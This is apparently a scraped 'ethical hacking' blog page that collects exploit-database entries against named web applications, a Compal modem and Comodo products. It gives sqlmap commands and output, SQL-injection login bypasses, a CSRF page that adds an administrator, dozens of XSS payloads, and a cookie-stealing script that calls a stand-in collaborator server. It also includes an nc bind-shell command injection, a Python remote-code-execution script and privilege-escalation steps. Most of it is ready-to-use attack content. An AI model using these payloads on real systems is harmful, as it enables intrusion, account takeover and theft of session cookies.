# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files
## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.
## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;
Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.
-HTTP Method : GET
- Sqlmap command: sqlmap -u 'http://192.168.1.104/view.php?mod=admin&view=repod&id=plans' --cookie="PHPSESSID=t1bc9vj67odrj3bd096g0rffe0"
- Sqlmap Output :
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[00:47:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 22 to 40 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 42 to 60 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 62 to 80 columns'
[00:47:54] [INFO] testing 'MySQL UNION query (98) - 82 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 650 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: mod=admin&view=repod&id=plans WHERE 6586=6586 AND 9310=9310#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mod=admin&view=repod&id=plans WHERE 3317=3317 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(4063=4063,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mod=admin&view=repod&id=plans WHERE 4122=4122 AND (SELECT * FROM (SELECT(SLEEP(5)))zWVH)--
---
[00:47:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0
[00:47:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 444 times
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141674
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983
*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter
In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
# Date: 17-10-2021
# Exploit Author: Aniket Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP
Steps to Reproduce:
1)Navigate to http://127.0.0.1/employment_application & Login with staff account .
2) Navigate to vacancies tab
3) Click on Add new .
4)Add Payload
"><img src=x onerror=alert(1)>
in Vacancy Title field.
5)Click on Save and you are done. It's gonna be triggered when anyone
visits the application.
Request:-
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------15502044322641666722659366422
Content-Length: 931
Origin: http://127.0.0.1
DNT: 1
Connection: close
Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: no-transform
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="id"
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="title"
"><img src=x onerror=alert(1)>
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="designation_id"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="slots"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="status"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="description"
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------15502044322641666722659366422--
# Title: Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)
# Exploit Author: Yash Mahajan
# Date: 2021-10-09
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Version: 1
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Tested On: Windows 10, XAMPP
# Vulnerable Parameters: "id" , "username"
Steps to Reproduce:
A) SQL Injection (Authentication Bypass)
1) Navigate to http://localhost/employment_application/admin/login.php
2) Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
3) Click on "Login" button and you are logged in as administrator.
Request:
========
POST /employment_application/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/employment_application/admin/login.php
Cookie: PHPSESSID=fk1gp1s7stu7kitjmhvjfakjqk
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username='+or+1%3D1--+-&password=admin
--------------------------------------------------------------------------------
B)
1) Vulnerable Parameter: "id"
2) Sqlmap Command to get retrieve tables from the database
3) python sqlmap.py -u "http://localhost/employment_application/?page=view_vacancy&id=1" --level=3 --risk=2 --banner --dbms=sqlite --tables
# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP
Detail:
The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.
CSRF POC:-
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"
method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="Test" />
<input type="hidden" name="username" value="Test" />
<input type="hidden" name="type" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP
Step to reproduce:-
1)Login with staff account & Navigate to Vacancies tab.
2)Click on add new vacancies .Put any random information on other field except description & go to the description window .
3)In the description field select insert link .
5) In Text to display the field add the following payload .
"><img src=x onerror=alert(1)>
*6)Click on save & you are done.It's gonna be triggered when some one open
vacancies details *
Request:-
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)
Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------156186133432167175201476666002
Content-Length: 1012
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="id"
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="title"
Test1ee
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="designation_id"
4
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="slots"
1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="status"
1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="description"
<p><br><a href="http://google.com" target="_blank">"><img src="x"
onerror="alert(1)"></a></p>
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------156186133432167175201476666002--
# Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass
# Date: 16/10/2020
# Exploit Author: Oğuz Türkgenç
# Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3
Step 1: Open the URL http://localhost/cvms/index.php
Step 2: use payload ot' or 1=1# in user and password field
Malicious Request
POST /cvms/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.175.128/cvms/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://localhost
Connection: close
Cookie: lang=english; PHPSESSID=qkg4nmdq97r4jkvkm4raa34660
Upgrade-Insecure-Requests: 1
username=ot%27+or+1%3D1+%23&password=ot%27+or+1%3D1+%23&login=
Step 3: You will be logged in as admin.
Compal CH7465LG-LC modem/router multiple vulnerabilities
--------------------------------------------------------
The following vulnerabilities are the result of a quick check (~3 hours)
of the Mercury modem. We performed a systematic and deeper evaluation of
this device also, which result will be described in a separate report [2] and advisory.
Platforms / Firmware confirmed affected:
- Compal CH7465LG-LC, CH7465LG-NCIP-4.50.18.13-NOSH
Vulnerabilities
---------------
Insecure session management
The web interface uses cookies, but is not verified. Thus, if admin
login is successful, the IP address and the browser type of the admin
user are stored and everybody can access the management interface with
the same IP and the same user-agent.
Information leakage
Some information requests can be performed without authentication. For
example an attacker can obtain the following information pieces:
- Global settings (SW version, vendor name, etc.)
- CSRF token
- Event log
- LAN user table
- Ping response
Unauthenticated deny of service attack
Factory reset can be initiated without authentication with a simple POST
request to the getter.xml.
Unauthenticated configuration changes
Some settings modification can be performed without authentication, for
example the first install flag and the ping command.
Unauthenticated command injection
The ping diagnostic function is vulnerable to system command injection,
because parameters are checked only at the client side. Using the
following ping target, the attacker can gain local root access to the
device:
“token=<csrf_token>&fun=126&Type=0&Target_IP=127.0.0.1&Ping_Size=64;nc
-l -p 1337 -e /bin/sh;&Num_Ping=3&Ping_Interval=1”
Timeline
--------
- 2015.10.21: SEARCH-LAB received two sample boxes from the Compal Mercury devices from UPC Magyarorszag
- 2015.10.21: Within three hours we reported a remotely exploitable vulnerability on the device
- 2015.10.21: Liberty Global asked for a commercial proposal on executing an overall security evaluation of the Compal device.
- 2015.10.24: A proposal was sent to Liberty Global.
- 2015.11.09: Liberty Global asked to execute the evaluation as a pilot project without financial compensation.
- 2015.12.07: End Use Certificate for Dual-Use Items was asked from Liberty Global as the developer of the device is located in China.
- 2016.01.07: The 99-page-long Evaluation Report on Compal Mercury modem was sent to Liberty Global with the restriction that they are not allowed to forward it outside of the European Union until a signed End Use Certificate is received.
- 2016.01.07: First reaction to the report said: “Bloody hell, that is not a small document ;)”
- 2016.01.11: Liberty Global sent the signed End Use Certificate for Dual-Use Items to SEARCH-LAB
- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
Recommendations
---------------
We do not know about any possible solution. Firmware update should install the ISP after the fix will be ready.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
[2] http://www.search-lab.hu/media/Compal_CH7465LG_Evaluation_Report_1.1.pdf
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8
import requests
def RndInt(Lenght):
from random import choice
from string import digits
RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)
if __name__ == "__main__":
IP = input("IP: ")
Port = input("Port: ")
Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''
BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
BaseNComdURL = BaseURL + "&k=" + Command
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
FullURL = BaseNComdURL + LastPart
AddetionalEnter = BaseURL + "&k=%0a" + LastPart
try:
FirstResponse = requests.get(FullURL).text
except:
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
exit(1)
SecondResponse = requests.get(AddetionalEnter).text
if SecondResponse.find("Configuration has been altered") == -1:
print("\nExploit Failed!\n")
exit(1)
else:
print("\nOK! Command Ran!\n")
exit(0)
Comodo GeekBuddy Local Privilege Escalation (CVE-2014-7872)
Jeremy Brown [jbrown3264/gmail]
-Synopsis-
Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall
and Comodo Internet Security, runs a passwordless, background VNC server
and listens for incoming connections. This can allow for at least local
privilege escalation on several platforms. It also may be remotely
exploitable via CSRF-like attacks utilizing a modified web-based VNC client
(eg. a Java VNC client).
-Repro-
1) Install GeekBuddy (either standalone or bundled with the aforementioned
packages)
2) Administrator (or other user) logs into the system so the VNC server
will be started
3) Start another login to the system (eg. target OS is Windows Server)
4) Connect to the VNC server on localhost to assume the Admin session
-Fix-
Comodo says they have fix this vulnerability with the v4.18.121 release in
October 2014
-References-
https://technet.microsoft.com/en-US/dn613815
http://archive.hack.lu/2014/Microsoft%20Vulnerability%20Research%20-%20How%20to%20be%20a%20Finder%20as%20a%20Vendor.pdf
# Exploit Title: Comodo Dragon Browser Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: https://www.comodo.com
# Software Link: https://www.comodo.com/home/browsers-toolbars/browser.php
# Version: Software Version <= 52.15.25.663
# Tested on: Windows 7 x86/x64
1. Description
Comodo Dragon Browser Update Service (DragonUpdater) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
C:\>sc qc DragonUpdater
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DragonUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Dragon Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local attacker must insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
Additional notes :
Fixed in version 52.15.25.664
https://forums.comodo.com/news-announcements-feedback-cd/comodo-dragon-v521525664-is-now-available-for-download-t116786.0.html
Vulnerability Disclosure Timeline:
=========================
24/09/2016 - Contact With Vendor
26/09/2016 - Vendor Response
03/10/2016 - Release Fixed Version
##################################################################################################################################
# Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting
# Date: 18.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://cdome.comodo.com/firewall/
# Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278
# Version: 2.7.0
##################################################################################################################################
Introduction
Comodo Dome Firewall (DFW) provides comprehensive security for enterprise
networks. The firewall software can be installed on a physical system or a
virtual machine.
Dome Firewall simplifies the overall management of network security by
delivering a single interface through which administrators can control
firewall policy, antivirus, intrusion prevention, website filtering,
traffic monitoring, VPN and proxy servers. Dome Firewall also features
highly configurable notifications, in-depth reporting and an informative
dashboard which offers a panoramic view of all major settings and network
events.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/korugan/login
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#################################################################################
XSS2 | Stored
URL
https://192.168.2.200:10443/korugan/admin_profiles
METHOD
Post
PARAMETER
comment
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
admin_name
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS4 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#################################################################################
XSS5 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
surname
PAYLOAD
<script>alert(5)</script>
#################################################################################
XSS6 | Stored
URL
https://192.168.2.200:10443/korugan/license_activation
METHOD
Post
PARAMETER
newLicense
PAYLOAD
<script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/korugan/cmclient
METHOD
Post
PARAMETER
organization
PAYLOAD
"><script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/korugan/backupschedule
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
<script>alert(8)</script>
#################################################################################
XSS9 | Reflected
URL
https://192.168.2.200:10443/korugan/netwizard2
METHOD
Post
PARAMETER
netmask_addr
PAYLOAD
<script>alert(9)</script>
#################################################################################
XSS10 | Reflected
URL
https://192.168.2.200:10443/korugan/routing
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(10)</script>
#################################################################################
XSS11 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
source
PAYLOAD
<script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/korugan/dhcp
METHOD
Post
PARAMETER
GATEWAY_GREEN
PAYLOAD
<script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/korugan/time
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
<script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/korugan/hotspot_permanent_users
METHOD
Post
PARAMETER
MACADDRESSES
PAYLOAD
<script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
<script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
<script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/korugan/fwgroups
METHOD
Post
PARAMETER
FWADDRESSES
PAYLOAD
<script>alert(20)</script>
#################################################################################
XSS21 | Stored
URL
https://192.168.2.200:10443/korugan/schedule
METHOD
Post
PARAMETER
SCHNAME
PAYLOAD
<script>alert(21)</script>
#################################################################################
XSS22 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
port
PAYLOAD
<script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
<script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
mac
PAYLOAD
<script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(25)</script>
#################################################################################
XSS26 | Stored
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(27)</script>
#################################################################################
XSS28 | Stored
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(28)</script>
#################################################################################
XSS29 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
<script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
<script>alert(30)</script>
#################################################################################
XSS31 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
<script>alert(31)</script>
#################################################################################
XSS32 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
<script>alert(32)</script>
#################################################################################
XSS33 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
<script>alert(33)</script>
#################################################################################
XSS34 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MIN_SIZE
PAYLOAD
<script>alert(34)</script>
#################################################################################
XSS35 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
<script>alert(35)</script>
#################################################################################
XSS36 | Reflected
URL
https://192.168.2.200:10443/korugan/https_exceptions
METHOD
Post
PARAMETER
EXCEPTIONSITELIST
PAYLOAD
<script>alert(36)</script>
#################################################################################
XSS37 | Reflected
URL
https://192.168.2.200:10443/korugan/smtpconfig
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
<script>alert(37)</script>
#################################################################################
XSS38 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
<script>alert(38)</script>
#################################################################################
XSS39 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
<script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_WHITELIST
PAYLOAD
<script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_BLACKLIST
PAYLOAD
<script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
remotenets
PAYLOAD
<script>alert(43)</script>
#################################################################################
XSS44 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
explicitroutes
PAYLOAD
<script>alert(44)</script>
#################################################################################
XSS45 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
static_ip
PAYLOAD
<script>alert(45)</script>
#################################################################################
XSS46 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_dns
PAYLOAD
<script>alert(46)</script>
#################################################################################
XSS47 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_domain
PAYLOAD
<script>alert(47)</script>
#################################################################################
XSS48 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_NETWORKS
PAYLOAD
<script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_DNS
PAYLOAD
<script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/korugan/vpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(50)</script>
#################################################################################
# Exploit Title: Comodo Chromodo Browser Unquoted Service Path Privilege Escalation
# Date: 03/10/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: https://www.comodo.com
# Software Link: https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php
# Version: Software Version <= 52.15.25.664
# Tested on: Windows 7 x86/x64
1. Description
Comodo Chromodo Browser Update Service (ChromodoUpdater) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
C:\>sc qc ChromodoUpdater
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ChromodoUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Comodo\Chromodo\chromodo_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Chromodo Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local attacker must insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
Additional notes :
Fixed in version 52.15.25.665
https://forums.comodo.com/news-announcements-feedback-cd/chromodo-v521525665-is-now-available-for-download-t116787.0.html
Vulnerability Disclosure Timeline:
=========================
03/10/2016 - Contact With Vendor
03/10/2016 - Vendor Response
05/10/2016 - Release Fixed Version
/*
Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation
Date - 23rd January 2015
